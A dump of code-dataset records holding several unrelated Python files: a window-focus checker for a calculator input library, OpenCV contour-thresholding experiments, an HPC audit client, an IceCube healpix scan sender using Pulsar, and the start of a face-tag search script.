self.python_window_id = 0\n return\n\n\n if self.python_window_id == 0:\n # Find python cosole window and ignore the top level of tkinter\n self.python_window_id = GetFirstWindowFromThreadProcessId(os.getpid(), (\"TkTopLevel\", \"pygame\"), True)\n\n if self.python_window_id == 0:\n # Python probably started by another process, in this mode python don't have 'real' window\n # So try going back in the parent processes to find a valid window\n ppid = os.getppid()\n for _ in range(20): # Loop limit to avoid infinite loop\n self.python_window_id = GetFirstWindowFromThreadProcessId(ppid, (\"TkTopLevel\", \"pygame\"), True)\n\n # Found an valid window\n if self.python_window_id: break\n\n # Not found at this time, try with his ppid\n from subprocess import check_output, CalledProcessError # need this because calling 'wmic' directly\n try: result = [i.strip() 
for i in check_output([\"wmic\", \"process\", \"where\", f\"ProcessId={ppid}\", \"get\", \"ParentProcessId\"]).decode().splitlines() if i.strip() != '']\n          except CalledProcessError: continue # Error happened, will try again in the next iteration\n\n          if len(result) == 1:\n            # No parent found, parent died or idk\n            prettywarn(\"cannot find a valid window to get inputs from the python console.\", RuntimeWarning)\n            del check_output, CalledProcessError\n            break\n          else: ppid = int(result[1].strip())\n\n        else: \n          # No valid parent window found!\n          # Python was probably started in no-shell mode and/or by a task\n          # So inputs from the python console will not be logged\n          prettywarn(\"cannot find a valid window to get inputs from the python console.\", RuntimeWarning)\n\n    def __call__(self):\n      # Check if kandinsky is imported; on the first successful check (if no error) this will re-init FocusChecker\n      if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n\n      fgw = ctypes.windll.user32.GetForegroundWindow()\n      return ((self.python_window_id and fgw == self.python_window_id) or \n              (self.kandinsky_window_id and fgw == self.kandinsky_window_id))\n\n\nelif sys.platform == \"linux\":\n  import Xlib\n\n  class FocusChecker:\n    kandinsky_window_id = 0\n    python_window_id = 0\n\n    def __init__(self):\n      if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n        # Finding kandinsky is simpler: no need to walk parent processes for a valid window\n        # 'TkTopLevel' is the class name of the root tkinter window\n        ...\n\n      if USE_KANDINSKY_INPUT_ONLY: \n        self.python_window_id = 0\n        return\n      \n      if self.python_window_id == 0:\n        # Find the python console window and ignore the tkinter top level\n        ...\n\n    def __call__(self):\n      # Check if kandinsky is imported; on the first successful check (if no error) this will re-init FocusChecker\n      if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n      \n      return False\n\n\nelif sys.platform == \"darwin\":  # sys.platform reports \"darwin\" on macOS (there is no \"macos\" value)\n\n  class FocusChecker:\n    kandinsky_window_id = 0\n    python_window_id = 0\n\n    def __init__(self):\n      if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n        # Finding kandinsky is simpler: no need to walk parent processes for a valid window\n        # 'TkTopLevel' is the class name of the root tkinter window\n        ...\n\n      if USE_KANDINSKY_INPUT_ONLY: \n        self.python_window_id = 0\n        return\n      \n      if self.python_window_id == 0:\n        # Find the python console window and ignore the tkinter top level\n        ...\n\n    def __call__(self):\n      # Check if kandinsky is imported; on the first successful check (if no error) this will re-init FocusChecker\n      if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules: self.__init__()\n      \n      return False\n\nelse:\n  # Platform not supported for focus checking, create a fake FocusChecker class\n  # The 'focus on only window' feature will be disabled\n  prettywarn(f\"platform '{sys.platform}' is not supported for capturing inputs only in the focused python or kandinsky window. \"\n             \"Inputs will be captured on the entire system\", ImportWarning)\n  \n  class FocusChecker:\n    def __init__(self): ...\n    def __call__(self): return True","sub_path":"src/ion/util/stuff/focus_checker.py","file_name":"focus_checker.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"424785300","text":"#testing\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n#num = \"0146\"\n#n = \"146\"\n#img = cv2.imread('Honda/80bar//T2-X=0.00_Y=1.00__'+num+\".tif\",-1)\n#img_rescaled = cv2.imread(direct + file, -1) #reads 16 bit without translating to 8 bit, if original file is in 16 bit\n#cv2.imwrite(\"./norm_imgs/\"+num+\".png\",img_rescaled)\n\ndef cropImage(image, cropTop=0, cropBottom = 0, cropLeft = 0, cropRight =0):\n\t\"Crop pixels off the image\"\n\tcropped_image = np.copy(image)\n\tcropped_image = cropped_image[cropTop:,cropLeft:]\n\tif cropBottom:\n\t\tcropped_image = cropped_image[:-cropBottom,]\n\tif cropRight:\n\t\tcropped_image = cropped_image[:,:-cropRight]\n\treturn cropped_image\n\ndirect = \"Old_Groups_Code/norm_imgs/\"\nfile = \"300.tif\"\nimg = cv2.imread(direct + file,-1)\nimg = cropImage(img)\nimg_max = img.max()\nimg_min = img.min()\nimg_rescaled = 255*((img-img_min)/(img_max-img_min))\nimg_rescaled = np.array(img_rescaled, dtype = int)\n\nplt.close('all')\n#plt.imshow(img, cmap='gray')\n#print(img)\n\n\ndef windowFrame(image, rows, columns, save = True):\n\tframes = []\n\tlenRows, lenColumns = image.shape\n\tfor i in range(rows):\n\t\tfor j in range(columns):\n\t\t\tpicture = image[int(lenRows / rows) * i: int(lenRows / rows) * (i+1), int(lenColumns / columns) * j: int(lenColumns / columns) * (j+1)]\n\t\t\tframes.append(picture)\n\n\tif save == True:\n\t\tos.system('mkdir windowFrames_'+file[0:-4])\n\t\tfor i in range(len(frames)):\n\t\t\tcv2.imwrite('windowFrames_' +file[0:-4] + \"/frame\"+str(i)+\".tif\",frames[i])\n\treturn frames\n\n\ndef histogram(image, show = True, save = ''):\n\tZ = np.concatenate(np.float32(image.reshape((-1,1))))\n\timg_max = image.max()\n\timg_min = image.min()\n\tbins = img_max - img_min\n\tfig, axs = plt.subplots(1, 1)\n\taxs.hist(Z, bins)\n\t#axs.set_xlim(0,255)\n\tif show:\n\t\tplt.show()\n\tif len(save) != 0:\n\t\tos.system('mkdir savedHistograms')\n\t\tplt.savefig('savedHistograms/' + save)\n\t\tplt.close()\n\ndef canny(img):\n\tedges = cv2.Canny(img,100,40)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(edges,cmap = 'gray')\n\tplt.title('Canny Edges'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn edges\n\ndef cannyClosing(img, kernelSize):\n\tedges = cv2.Canny(img, 100, 200)\n\tkernel = np.ones((kernelSize,kernelSize),np.uint8)\n\tclosing = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)\n\tdrawShapes(closing, img)\n\treturn closing\n\ndef bilateralFilter(img):\n\tblur = cv2.bilateralFilter(img,9,75,75)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Bilateral Filtered'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\ndef medianFilter(img):\n\tmedian = cv2.medianBlur(img,5)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(median,cmap = 'gray')\n\tplt.title('Median Filtered'), 
plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn median\n\ndef gaussianFilter(img):\n\tblur = cv2.GaussianBlur(img,(5,5),0)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Gaussian Filtered'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\ndef averageBlur(img):\n\tblur = cv2.blur(img, (5,5))\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(blur,cmap = 'gray')\n\tplt.title('Blurred Image'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\treturn blur\n\n#blur = gaussianFilter(img)\n#histogram(blur)\n\ndef histogramEqualization(img):\n\tequ = cv2.equalizeHist(img)\n\thistogram(equ)\n\tblur = gaussianFilter(equ)\n\thistogram(blur)\n\ndef adaptiveHistogram(img):\n\tclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n\tcl1 = clahe.apply(img)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(cl1,cmap = 'gray')\n\tplt.title('Adaptive Histogram'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\thistogram(cl1)\n\ndef laplace_sobel(img):\n\tlaplacian = cv2.Laplacian(img,cv2.CV_64F)\n\tsobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\n\tsobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n\t\n\tplt.subplot(2,2,1),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')\n\tplt.title('Laplacian'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')\n\tplt.title('Sobel X'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')\n\tplt.title('Sobel Y'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\n#frames = windowFrame(img, 5, 5)\n#for i in range(len(frames)):\n#\thistogram(frames[i], show = False, save = 'frame' + str(i))\n\ndef contourArea(contours, image = None):\n #Return array of contour areas\n return np.array([cv2.contourArea(contour) for contour in contours])\n\ndef contourBoundary(contour):\n\t'''\n\tSave location of the shape in the context of the larger image\n\t'''\n\n\tx,y,w,h = cv2.boundingRect(contour)\n\treturn np.array([y,y+h,x,x+w])\n\ndef cropContour(contour, image, border = 0):\n\t'''\n\tCrop shape from rest of image\n\t'''\n\n\tboundary = contourBoundary(contour) \n\t# create a single channel pixel white image\n\tcanvas = np.zeros(image.shape).astype(image.dtype) + 255\n\tfill = cv2.fillPoly(canvas, pts =[contour], color=0)\n\t#keep shape in grayscale, turn background white\n\tanti_fill = cv2.bitwise_or(image,fill)\n\tcroppedContour = anti_fill[boundary[0]:boundary[1],\\\n\t\t\t\t\tboundary[2]:boundary[3]]\n\t#also crop to slightly larger than boundary so shape isn't right at \n\t#the edge of the image\n\t#this will be useful if we want to draw more contours on a shape after cropping it\n\tif border:\n\t\tborderedContour = anti_fill[boundary[0]-border:boundary[1]+border,\\\n\t\t\t\t\tboundary[2]-border:boundary[3]+border]\n\t\treturn borderedContour\n\treturn croppedContour\n\n\ndef meanIntensity(contours, image):\n #Return mean intensity for each contour\n\n\tmeanIntensities = []\n\tfor contour in contours:\n\t\tcroppedContour = cropContour(contour, image)\n\t\tmask = np.logical_not(np.logical_not(croppedContour -255)).astype('uint8')\n\t\tmeanIntensities.append(cv2.mean(croppedContour, mask= 
mask)[0])\n \n\treturn np.array(meanIntensities)\n\n\ndef drawShapes(image_binarized, image):\n\t'''\n\tDraw contours onto images\n\t'''\n\tcontours, hierarchy = cv2.findContours(image_binarized, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tshapes_image = np.copy(image)\n\n\t#change back to RGB for easier visualization\n\tshapes_image = cv2.cvtColor(shapes_image, cv2.COLOR_GRAY2RGB)\n#\tplt.imshow(shapes_image) # uncomment these lines to plot in real time\n#\tplt.show()\n\tshapes_image = cv2.drawContours(shapes_image, contours, -1, (255,0,0), 1)\n\tplt.imshow(shapes_image) \n\tplt.show()\n\ndef kMeansHistogram(Z, label, kthresh, show = True, save = ''):\n\t'''\n\tTakes data for 1 dimensional kmeans and the resultant labels \n\tand plots histogram of clusters\n\t'''\n\tfig, axs = plt.subplots(1, 1)\n\tfor k in range(kthresh):\n\t\tcluster = Z[label == k]\n\t\tbins = 1+int(cluster.max() - cluster.min())\n\t\taxs.hist(cluster, bins, label = str(k))\n\taxs.legend()\n\tif show:\n\t\tplt.show()\n\tif len(save) != 0:\n\t\tos.system('mkdir savedHistograms')\n\t\tplt.savefig('savedHistograms/' + save)\n\t\tplt.close()\n\ndef adaptiveThresholding(image, thresholdType = 1, blockSize = 11, subtract = 2):\n\t'''\n\tApplies adaptive thresholding to image with either mean or Gaussian thresholding\n\tthresholdType of true gives adaptive mean thresholding and false gives adaptive Gaussian thresholding\n\tblockSize sets the size of the neighborhood, and subtract reduces the threshold by the given amount\n\t'''\n\tif thresholdType:\n\t\tthresh = cv2.ADAPTIVE_THRESH_MEAN_C\n\telse:\n\t\tthresh = cv2.ADAPTIVE_THRESH_GAUSSIAN_C\n\n\tproc = cv2.adaptiveThreshold(image, 255, thresh, \\\n\t\tcv2.THRESH_BINARY, blockSize, subtract)\n\t\n\tdrawShapes(proc, img)\n\ndef multiThresholding(image, kthresh, kthcenter = 0, plotHistogram = False):\n\n\tZ = image.reshape((-1,1))\n\tZ = np.float32(Z)\n\tcriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0) #directly copied from opencv documentation\n\tret,label,center = cv2.kmeans(Z,kthresh,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n\tif plotHistogram:\n\t\tkMeansHistogram(Z, label, kthresh)\n\tprint(center)\n\t# Now convert back into uint8, and make original image\n\tcenter = np.uint8(center)\n # Puts something into single array\n\tres = center[label.flatten()]\n # Takes 1-D array and puts back into image format\n\tkthreshed = res.reshape((image.shape))\n # Lowest grayscale k-means center: aka some color\n\tif(kthcenter == 0):\n\t\tthresh_val = min(center)[0]\n\telse:\n\t\tthresh_val = np.sort(np.concatenate(center))[kthcenter]\n\tprint(\"kmeans multithreshold value of \"+str(thresh_val)) \n\t#now threshold the k-means clustered image to only keep the darkest cluster\n\tret,proc = cv2.threshold(kthreshed,thresh_val,255,cv2.THRESH_BINARY) #binarizes\n # Binary image file\n\tprint(proc)\n # Threshold value\n\tprint(ret)\n\t#plt.imshow(proc,cmap = 'gray')\n\t#plt.show()\n\t#plt.imshow(img, cmap = 'gray')\n\t#plt.show()\n\t#canny(proc)\n\n\t\n\tdrawShapes(proc, img)\n\n\t\"\"\"\n\tprint(\"\\n Performing multithresholding...\")\n\tif data[\"kthresh\"] != 0:\n\t center1 = [] #darkest cluster\n\t center2 = [] #next darkest cluster\n\t total = 10\n\t for loc in img_locs[:total]:\n\t img = Image(loc)\n\t min_center = min(img.center)[0]\n\t min2_center = min(img.center[img.center != min(img.center)])\n\t #print(img.center)\n\t #print(min_center)\n\t #print(min2_center)\n\t \n\t center1.append(min_center)\n\t center2.append(min2_center)\n\t center1 = 
np.median(center1)\n\t center2 = np.median(center2)\n\t #thresh_val = (center1 + center2)/2\n\t thresh_val = center2\n\t #print(thresh_val)\n\t data[\"pixel_threshold\"] = thresh_val\n\t data[\"kthresh\"] = 0 \n\t with open('input.json','w') as f:\n\t json.dump(data,f,indent=4)\n\t print(\"final multithresholding value = %s \\n\" %(thresh_val)\n\t\"\"\"\n#histogram(img)\nmultiThresholding(img, 3)\n\n","sub_path":"auxiliary_functions/contourTesting.py","file_name":"contourTesting.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"545465213","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\nfrom hil_calls import HILCLI\n\nimport SwitchCalls\n\nclass AuditClient(object):\t\n\n\tdef list_nodes(self, list_type):\n\t\tresponse = HILCLI().list_nodes(list_type)\n\t\treturn response\n\n\tdef list_projects(self):\n\t\tresponse = HILCLI().list_projects()\n\t\treturn response\n\n\tdef list_project_network(self, project):\n\t\tresponse = HILCLI().list_project_network(project)\n\t\treturn response\n\n\tdef show_network(self, network):\n\t\tresponse = HILCLI().show_network(network)\n\t\treturn response\n\n\tdef show_node(self,node_name):\n\t\tresponse = HILCLI().show_node(node_name)\n\t\treturn response\n\n\tdef get_node_info(self, node_name):\n\t\tresponse = {}\n\t\tnode_info = HILCLI().show_node(node_name)\n\t\tif (node_info[\"project\"] != None):\n\t\t\tresponse[\"project\"] = node_info[\"project\"]\n\t\t\tnetwork = self.list_project_network(response[\"project\"])\n\t\t\tresponse[\"network\"] = network\n\t\t\tvlan = []\n\t\t\tfor n in network:\n\t\t\t\tvlan.append(AuditClient().show_network(n)[\"channels\"])\n\t\t\tresponse[\"vlan\"] = vlan\n\t\telse:\n\t\t\tresponse[\"project\"] = \"\"\n\t\t\tresponse[\"network\"] = []\n\t\t\tresponse[\"vlan\"] = [[]]\n\t\treturn response\n\t\t\n# -------- SWITCH FUNCTIONS ------------\n\n\tdef list_switch_vlans(self, port):\n\t\tresponse = SwitchCalls.list_vlans(port)\n\t\treturn response\n\n\tdef list_switch_ports(self, vlan):\n\t\tresponse = SwitchCalls.list_ports(vlan)\n\t\treturn response\n","sub_path":"audit_rest/audit_rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104974472","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport numpy\nimport healpy\nimport os\nimport random\n\nimport tqdm\nimport time\n\nfrom icecube import icetray, dataclasses\nfrom icecube import gulliver, millipede\nfrom icecube import astro\nfrom icecube import VHESelfVeto\nfrom icecube import frame_object_diff\nfrom icecube.frame_object_diff.segments import uncompress\nfrom I3Tray import *\n\nimport config\n\nfrom utils import get_event_mjd, create_pixel_list\nfrom pulsar_icetray import PulsarClientService, SendPFrameWithMetadata\n\nclass SendPixelsToScan(icetray.I3Module):\n def __init__(self, ctx):\n super(SendPixelsToScan, self).__init__(ctx)\n self.AddParameter(\"FramePacket\", \"The GCDQp frame packet to send\", None)\n \n self.AddParameter(\"NSide\", \"The healpix resolution in terms of \\\"nside\\\".\", 8)\n\n self.AddParameter(\"AreaCenterNSide\", \"The healpix nside of the center pixel defined in \\\"AreaCenterPixel\\\".\", None)\n self.AddParameter(\"AreaCenterPixel\", \"The healpix pixel number where the area to be scanned is centered.\", None)\n self.AddParameter(\"AreaNumPixels\", \"The 
number of pixels in the area to be scanned (this is in terms of \\\"NSide\\\").\", None)\n\n self.AddParameter(\"PixelList\", \"A specific list of pixels to send.\", None)\n\n self.AddParameter(\"InputTimeName\", \"Name of an I3Double to use as the vertex time for the coarsest scan\", \"HESE_VHESelfVetoVertexTime\")\n self.AddParameter(\"InputPosName\", \"Name of an I3Position to use as the vertex position for the coarsest scan\", \"HESE_VHESelfVetoVertexPos\")\n self.AddParameter(\"OutputParticleName\", \"Name of the output I3Particle\", \"MillipedeSeedParticle\")\n self.AddParameter(\"InjectEventName\", \"Event name in each P-frame - for later sorting\", None)\n self.AddParameter(\"PosVariations\", \"An array of positional offsets to use for each pixel\", [dataclasses.I3Position(0.,0.,0.)])\n self.AddOutBox(\"OutBox\")\n\n def Configure(self):\n self.GCDQpFrames = self.GetParameter(\"FramePacket\")\n self.nside = self.GetParameter(\"NSide\")\n self.input_pos_name = self.GetParameter(\"InputPosName\")\n self.input_time_name = self.GetParameter(\"InputTimeName\")\n self.output_particle_name = self.GetParameter(\"OutputParticleName\")\n self.inject_event_name = self.GetParameter(\"InjectEventName\")\n self.posVariations = self.GetParameter(\"PosVariations\")\n \n self.area_center_nside = self.GetParameter(\"AreaCenterNSide\")\n self.area_center_pixel = self.GetParameter(\"AreaCenterPixel\")\n self.area_num_pixels = self.GetParameter(\"AreaNumPixels\")\n\n self.pixel_list_override = self.GetParameter(\"PixelList\")\n\n if (self.area_center_nside is not None or self.area_center_pixel is not None or self.area_num_pixels is not None) and \\\n (self.area_center_nside is None or self.area_center_pixel is None or self.area_num_pixels is None):\n raise RuntimeError(\"You have to either set none of the three options AreaCenterNSide,AreaCenterPixel,AreaNumPixels or all of them\")\n\n p_frame = self.GCDQpFrames[-1]\n if p_frame.Stop != icetray.I3Frame.Stream('p'):\n raise RuntimeError(\"Last frame of the GCDQp packet is not type 'p'.\")\n\n self.seed_position = p_frame[self.input_pos_name]\n self.seed_time = p_frame[self.input_time_name].value\n self.seed_energy = numpy.nan\n\n self.event_header = p_frame[\"I3EventHeader\"]\n self.event_mjd = get_event_mjd(self.GCDQpFrames)\n\n if self.pixel_list_override is not None:\n self.pixels_to_push = self.pixel_list_override\n print(\"Going to submit {} pixels (from a specific list: {})\".format(len(self.pixels_to_push), self.pixel_list_override))\n else:\n self.pixels_to_push = create_pixel_list(\n self.nside,\n area_center_nside=self.area_center_nside,\n area_center_pixel=self.area_center_pixel,\n area_num_pixels=self.area_num_pixels\n )\n \n print(\"Going to submit {} pixels\".format(len(self.pixels_to_push)))\n \n self.pixel_index = 0\n \n def Process(self):\n # driving module - we will be called repeatedly by IceTray with no input frames\n if self.PopFrame():\n raise RuntimeError(\"SendPixelsToScan needs to be used as a driving module\")\n\n # push GCDQp packet if not done so already\n if self.GCDQpFrames:\n for frame in self.GCDQpFrames:\n self.PushFrame(frame)\n self.GCDQpFrames = None\n print(\"Commencing full-sky scan...\")\n return\n\n # submit one more pixel\n if len(self.pixels_to_push) > 0:\n # get the first item from the list and remove it from the list\n next_pixel = self.pixels_to_push.pop(0)\n \n # create and push a P-frame to be processed\n self.CreatePFrame(nside=self.nside, pixel=next_pixel, pixel_index=self.pixel_index)\n 
self.pixel_index+=1\n else:\n # we are done.\n self.RequestSuspension()\n\n def CreatePFrame(self, nside, pixel, pixel_index):\n dec, ra = healpy.pix2ang(nside, pixel)\n dec = numpy.pi/2. - dec\n zenith, azimuth = astro.equa_to_dir(ra, dec, self.event_mjd)\n zenith = float(zenith)\n azimuth = float(azimuth)\n direction = dataclasses.I3Direction(zenith,azimuth)\n\n position = self.seed_position\n time = self.seed_time\n energy = self.seed_energy\n\n for i in range(0,len(self.posVariations)):\n posVariation = self.posVariations[i]\n p_frame = icetray.I3Frame(icetray.I3Frame.Physics)\n\n thisPosition = dataclasses.I3Position(position.x + posVariation.x, position.y + posVariation.y, position.z + posVariation.z)\n\n # generate the particle from scratch\n particle = dataclasses.I3Particle()\n particle.shape = dataclasses.I3Particle.ParticleShape.InfiniteTrack\n particle.fit_status = dataclasses.I3Particle.FitStatus.OK\n particle.pos = thisPosition\n particle.dir = direction\n particle.time = time\n particle.energy = energy\n p_frame[self.output_particle_name] = particle\n\n # generate a new event header\n eventHeader = dataclasses.I3EventHeader(self.event_header)\n eventHeader.sub_event_stream = \"SCAN_nside%04u_pixel%04u_posvar%04u\" % (nside, pixel, i)\n eventHeader.sub_event_id = pixel\n p_frame[\"I3EventHeader\"] = eventHeader\n p_frame[\"SCAN_HealpixPixel\"] = icetray.I3Int(int(pixel))\n p_frame[\"SCAN_HealpixNSide\"] = icetray.I3Int(int(nside))\n p_frame[\"SCAN_PositionVariationIndex\"] = icetray.I3Int(int(i))\n\n # an overall sequence index, 0-based, in case we need to re-start\n p_frame[\"SCAN_EventOverallIndex\"] = icetray.I3Int( int(i) + pixel_index*len(self.posVariations))\n if self.inject_event_name is not None:\n p_frame[\"SCAN_EventName\"] = dataclasses.I3String(self.inject_event_name)\n\n self.PushFrame(p_frame)\n\n\ndef send_scan(frame_packet, broker, auth_token, topic, metadata_topic_base, event_name, nside=1, area_center_nside=None, area_center_pixel=None, area_num_pixels=None, pixel_list=None):\n if (area_center_nside is not None or area_center_pixel is not None or area_num_pixels is not None) and \\\n (area_center_nside is None or area_center_pixel is None or area_num_pixels is None):\n raise RuntimeError(\"You have to either set none of the three options area_center_nside,area_center_pixel,area_num_pixels or all of them\")\n \n if pixel_list is not None:\n producer_name = None # do not use deduplication if we have a specific list of pixels\n elif area_center_nside is None:\n producer_name = \"skymap_to_scan_producer-\" + event_name + \"-nside\" + str(nside)\n else:\n producer_name = \"skymap_to_scan_producer-\" + event_name + \"-nside\" + str(nside) + \"-Cn\" + str(area_center_nside) + \"-p\" + str(area_center_pixel)\n \n print(\"producer_name is {}\".format(producer_name))\n \n # set up the positional variations (we use 7)\n variationDistance = 20.*I3Units.m\n posVariations = [\n dataclasses.I3Position(0.,0.,0.),\n dataclasses.I3Position(-variationDistance,0.,0.),\n dataclasses.I3Position( variationDistance,0.,0.),\n dataclasses.I3Position(0.,-variationDistance,0.),\n dataclasses.I3Position(0., variationDistance,0.),\n dataclasses.I3Position(0.,0.,-variationDistance),\n dataclasses.I3Position(0.,0., variationDistance)\n ]\n\n if area_num_pixels is None:\n num_pix = healpy.nside2npix(nside)\n else:\n num_pix = area_num_pixels\n num_it = num_pix*len(posVariations)\n pbar = tqdm.tqdm(\n total=num_it,\n desc = event_name,\n ascii = \" .oO0\",\n leave = True\n )\n\n # connect to 
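CreatePFrame above turns a healpix pixel index into an equatorial direction; note that healpy.pix2ang returns (colatitude, longitude), which is why the code subtracts from pi/2 to get declination. A hedged stand-alone sketch of just that conversion (the nside value is arbitrary):

import numpy as np
import healpy

nside = 8  # arbitrary resolution for illustration
for pixel in range(healpy.nside2npix(nside))[:3]:
    theta, phi = healpy.pix2ang(nside, pixel)  # colatitude, longitude in radians
    dec = np.pi / 2.0 - theta  # declination
    ra = phi                   # right ascension
    print(pixel, ra, dec)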
pulsar\n client_service = PulsarClientService(\n BrokerURL=broker,\n AuthToken=auth_token\n )\n\n tray = I3Tray()\n \n # create P frames for a GCDQp packet\n tray.AddModule(SendPixelsToScan, \"SendPixelsToScan\",\n FramePacket=frame_packet,\n NSide=nside,\n InputTimeName=\"HESE_VHESelfVetoVertexTime\",\n InputPosName=\"HESE_VHESelfVetoVertexPos\",\n OutputParticleName=\"MillipedeSeedParticle\",\n InjectEventName=event_name,\n PosVariations=posVariations,\n AreaCenterNSide=area_center_nside,\n AreaCenterPixel=area_center_pixel,\n AreaNumPixels=area_num_pixels,\n PixelList=pixel_list\n )\n\n # sanity check\n def makeSurePulsesExist(frame, pulsesName):\n if pulsesName not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName))\n if pulsesName+\"TimeWindows\" not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName+\"TimeWindows\"))\n if pulsesName+\"TimeRange\" not in frame:\n print(frame)\n raise RuntimeError(\"{0} not in frame\".format(pulsesName+\"TimeRange\"))\n tray.AddModule(makeSurePulsesExist, \"makeSurePulsesExist\",\n pulsesName=\"SplitInIcePulsesLatePulseCleaned\")\n\n # now send all P-frames as pulsar messages\n tray.Add(SendPFrameWithMetadata, \"SendPFrameWithMetadata\",\n ClientService=client_service,\n Topic=topic,\n MetadataTopicBase=metadata_topic_base,\n ProducerName=producer_name,\n I3IntForSequenceID=\"SCAN_EventOverallIndex\",\n PartitionKey=lambda frame: frame[\"SCAN_EventName\"].value + '_' + str(frame[\"SCAN_HealpixNSide\"].value) + '_' + str(frame[\"SCAN_HealpixPixel\"].value)\n )\n \n def update_pbar(frame):\n pbar.set_postfix(pixel=\"{}/{}\".format(frame[\"SCAN_EventOverallIndex\"].value/len(posVariations)+1, num_pix), refresh=False)\n pbar.update(1)\n tray.Add(update_pbar, \"update_pbar\")\n \n tray.Execute()\n del tray\n\n pbar.close()\n\n del client_service\n","sub_path":"send_scan.py","file_name":"send_scan.py","file_ext":"py","file_size_in_byte":11200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571059440","text":"import logging\nimport pickle\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom visualization import visualize_faces, visualize_face_in_files\n\n\ndef make_face_to_file_dict(files_with_tags):\n faces_to_filetags_dict = {}\n for file_with_tag in files_with_tags:\n for tags in file_with_tag.get(\"faces\"):\n name = tags.get(\"name\")\n if name not in faces_to_filetags_dict:\n faces_to_filetags_dict[name] = []\n else:\n file_name = file_with_tag.get(\"file\")\n faces_to_filetags_dict[name].append({\"file\":file_with_tag.get(\"file\"), \"face\":tags})\n return faces_to_filetags_dict\n\n\ndef find_faces(search_name, files_with_tags):\n files_with_name = []\n for file_with_tag in files_with_tags:\n names_in_file = {}\n for tags in file_with_tag.get(\"faces\"):\n name = tags.get(\"name\")\n if search_name in name:\n file_name = file_with_tag.get(\"file\")\n files_with_name.append({\"name\":name, \"file\":file_with_tag.get(\"file\"), \"face\":tags})\n return files_with_name\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--pickle_file', help='Pickle file (acts as database)',\n default=\"files_with_tags.p\")\n parser.add_argument('--search_name', help='Name to search in database', default=\"\")\n parser.add_argument('--plot', help='Shall plot face tags?',\n default=\"no\")\n\n args = parser.parse_args()\n shall_plot = True if args.plot == \"yes\" else False\n\n logging.info(\"Loading pickle file...\")\n 
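make_face_to_file_dict above builds the name-to-occurrences mapping by hand, and its else branch means the first file a face appears in is silently dropped. A corrected sketch with collections.defaultdict; the sample records are invented:

from collections import defaultdict

# Invented records shaped like files_with_tags above.
files_with_tags = [
    {"file": "a.jpg", "faces": [{"name": "alice"}, {"name": "bob"}]},
    {"file": "b.jpg", "faces": [{"name": "alice"}]},
]

faces_to_filetags = defaultdict(list)
for record in files_with_tags:
    for tags in record.get("faces", []):
        # Every occurrence is kept, including the first one.
        faces_to_filetags[tags["name"]].append({"file": record["file"], "face": tags})

for name, hits in faces_to_filetags.items():
    print("{} appears in {} images".format(name, len(hits)))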
